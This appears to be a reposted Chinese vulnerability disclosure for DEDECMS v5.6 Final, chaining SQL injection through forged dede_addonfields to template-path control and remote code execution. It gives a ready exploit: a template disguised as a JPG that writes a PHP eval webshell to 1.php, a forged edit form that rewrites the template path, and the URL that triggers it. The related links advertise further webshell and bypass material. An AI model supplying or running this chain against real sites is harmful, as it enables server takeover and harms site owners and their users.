影响版本:

DEDECMS v5.6 Final

程序介绍:

DedeCms 基于PHP+MySQL的技术开发，支持Windows、Linux、Unix等多种服务器平台，从2004年开始发布第一个版本开始，至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场，目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心，是目前国内应用最广泛的php类CMS系统。

漏洞分析:

Dedecms V5.6 Final版本中的各个文件存在一系列问题，经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去，然后通过SQL注入修改附加表的模板路径为我们上传的模板路径，模板解析类：include/inc_archives_view.php没有对模板路径及名称做任何限制，则可以成功执行恶意代码。

1、member/article_edit.php文件（注入）：

//漏洞在member文件夹下普遍存在，$dede_addonfields是由用户提交的，可以被伪造，伪造成功即可带入sql语句，于是我们可以给附加表的内容进行update赋值。

PHP Code复制内容到剪贴板 … //分析处理附加表数据 $inadd_f=''; if(!emptyempty($dede_addonfields))//自己构造$dede_addonfields { $addonfields=explode(';',$dede_addonfields); if(is_array($addonfields)) { print_r($addonfields); foreach($addonfieldsas$v) { if($v=='') { continue; } $vs=explode(',',$v); if(!isset(${$vs[0]})) { ${$vs[0]}=''; } ${$vs[0]}=GetFieldValueA(${$vs[0]},$vs[1],$aid); $inadd_f.=','.$vs[0]."='".${$vs[0]}."'"; echo$inadd_f; } } } … if($addtable!='') { $upQuery="Update`$addtable`settypeid='$typeid',body='$body'{$inadd_f},userip='$userip'whereaid='$aid'";//执行构造的sql if(!$dsql->ExecuteNoneQuery($upQuery)) { ShowMsg("更新附加表`$addtable`时出错，请联系管理员！","javascript:;"); exit(); } } … 2、include/inc_archives_view.php：

//这是模板处理类，如果附加表的模板路径存在，直接从附加表取值；GetTempletFile获取模板文件的方法就是取的此处的模板路径，从来带进去解析。

PHP Code复制内容到剪贴板 … //issystem==-1表示单表模型，单表模型不支持redirecturl这类参数，因此限定内容普通模型才进行下面查询 if($this->ChannelUnit->ChannelInfos['addtable']!=''&&$this->ChannelUnit->ChannelInfos['issystem']!=-1) { if(is_array($this->addTableRow)) { $this->Fields['redirecturl']=$this->addTableRow['redirecturl']; $this->Fields['templet']=$this->addTableRow['templet'];//取值 $this->Fields['userip']=$this->addTableRow['userip']; } $this->Fields['templet']=(emptyempty($this->Fields['templet'])?'':trim($this->Fields['templet'])); $this->Fields['redirecturl']=(emptyempty($this->Fields['redirecturl'])?'':trim($this->Fields['redirecturl'])); $this->Fields['userip']=(emptyempty($this->Fields['userip'])?'':trim($this->Fields['userip'])); } else { $this->Fields['templet']=$this->Fields['redirecturl']=''; } … //获得模板文件位置 functionGetTempletFile() { global$cfg_basedir,$cfg_templets_dir,$cfg_df_style; $cid=$this->ChannelUnit->ChannelInfos['nid']; if(!emptyempty($this->Fields['templet'])) { $filetag=MfTemplet($this->Fields['templet']); if(!ereg('/',$filetag))$filetag=$GLOBALS['cfg_df_style'].'/'.$filetag; } else { $filetag=MfTemplet($this->TypeLink->TypeInfos["temparticle"]); } $tid=$this->Fields['typeid']; $filetag=str_replace('{cid}',$cid,$filetag); $filetag=str_replace('{tid}',$tid,$filetag); $tmpfile=$cfg_basedir.$cfg_templets_dir.'/'.$filetag; if($cid=='spec') { if(!emptyempty($this->Fields['templet'])) { $tmpfile=$cfg_basedir.$cfg_templets_dir.'/'.$filetag; } else { $tmpfile=$cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm"; } } if(!file_exists($tmpfile)) { $tmpfile=$cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/".($cid=='spec'?'article_spec.htm':'article_default.htm'); } return$tmpfile; } 漏洞利用:

1.上传一个模板文件：

注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：

uploads/userup/2/12OMX04-15A.jpg

模板内容是（如果限制图片格式，加gif89a）：

{dede:name runphp='yes'}

$fp = @fopen("1.php", 'a');

@fwrite($fp, '<'.'?php'."rnrn".'eval($_POST[cmd])'."rnrn?".">rn");

@fclose($fp);

{/dede:name}

2.修改刚刚发表的文章，查看源文件，构造一个表单：

XML/HTML Code复制内容到剪贴板 <formclass="mTB10mL10mR10"name="addcontent"id="addcontent"action="http://127.0.0.1/dede/member/article_edit.php"method="post"enctype="multipart/form-data"onsubmit="returncheckSubmit();"> <inputtype="hidden"name="dopost"value="save"/> <inputtype="hidden"name="aid"value="2"/> <inputtype="hidden"name="idhash"value="f5f682c8d76f74e810f268fbc97ddf86"/> <inputtype="hidden"name="channelid"value="1"/> <inputtype="hidden"name="oldlitpic"value=""/> <inputtype="hidden"name="sortrank"value="1275972263"/> <divid="mainCp"> <h3class="meTitle"><strong>修改文章</strong></h3> <divclass="postForm"> <label>标题：</label> <inputname="title"type="text"id="title"value="11233ewsad"maxlength="100"class="intxt"/> <label>标签TAG：</label> <inputname="tags"type="text"id="tags"value="hahah,test"maxlength="100"class="intxt"/>(用逗号分开) <label>作者：</label> <inputtype="text"name="writer"id="writer"value="test"maxlength="100"class="intxt"style="width:219px"/> <label>隶属栏目：</label> <selectname='typeid'size='1'> <optionvalue='1'class='option3'selected=''>测试栏目</option> </select><spanstyle="color:#F00">*</span>(不能选择带颜色的分类) <label>我的分类：</label> <selectname='mtypesid'size='1'> <optionvalue='0'selected>请选择分类...</option> <optionvalue='1'class='option3'selected>hahahha</option> </select> <label>信息摘要：</label> <textareaname="description"id="description">1111111</textarea> (内容的简要说明) <label>缩略图：</label> <inputname="litpic"type="file"id="litpic"onchange="SeePicNew('divpicview',this);"maxlength="100"class="intxt"/> <inputtype='text'name='templet' value="../uploads/userup/2/12OMX04-15A.jpg"> <inputtype='text'name='dede_addonfields' value="templet,htmltext;">（这里构造） </div> <!--表单操作区域--> <h3class="meTitle">详细内容</h3> <divclass="contentShowpostForm"> <inputtype="hidden"id="body"name="body"value="<div><ahref="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg"target="_blank"><imgborder="0"alt=""src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg"width="1010"height="456"/></a></div><p><?phpinfo()?>1111111</p>"style="display:none"/><inputtype="hidden"id="body___Config"value="FullPage=false"style="display:none"/><iframeid="body___Frame"src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member"width="100%"height="350"frameborder="0"scrolling="no"></iframe> <label>验证码：</label> <inputname="vdcode"type="text"id="vdcode"maxlength="100"class="intxt"style='width:50px;text-transform:uppercase;'/> <imgsrc="http://127.0.0.1/dede/include/vdimgck.php"alt="看不清？点击更换"align="absmiddle"style="cursor:pointer"onclick="this.src=this.src+'?'"/> <buttonclass="button2"type="submit">提交</button> <buttonclass="button2ml10"type="reset"onclick="location.reload();">重置</button> </div> </div> </form> 提交，提示修改成功，则我们已经成功修改模板路径。

3.访问修改的文章：

假设刚刚修改的文章的aid为2，则我们只需要访问：

http://127.0.0.1/dede/plus/view.php?aid=2

即可以在plus目录下生成小马：1.php

解决方案:

厂商补丁:

DEDECMS

------------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dedecms.com/

信息来源: oldjun's Blog

【DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)】相关文章：

★ DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6

★ dedecms v5.6 GBK 注入漏洞利用(member/index.php)

★ 万博企业网站管理系统注入漏洞(MemberLogin.asp)

★ dedecms官方模板包含一句话后门木马

★ ODOR1–PHP extract 后门使用方法

★ ECSHOP php商城系统过滤不严导致SQL注入漏洞

★ 讯时系统(xuas)最新通杀漏洞0day图文说明

★ 过安全狗/D盾/360的PHP一句话木马与防范方法

★ 科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

★ 入侵中国红客联盟过程分析